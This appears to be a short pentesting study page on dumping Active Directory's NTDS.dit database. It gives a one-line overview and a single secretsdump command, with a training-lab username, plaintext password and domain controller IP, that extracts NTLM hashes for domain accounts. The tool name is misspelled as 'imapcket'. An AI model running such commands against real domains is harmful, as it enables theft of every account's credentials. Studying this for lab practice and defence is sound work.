For the complete documentation index, see llms.txt. This page is also available as Markdown.

Dumping the NTDS.dit

Overview

NTDS.dit is the core database file of Active Directory, storing user accounts, groups, and their attributes on the Domain Controllers

Dumping NTDS.dit via Secretsdump

imapcket-secretsdump PNPT.local/john:'Password1!'@192.168.1.129 -just-dc-ntlm

Last updated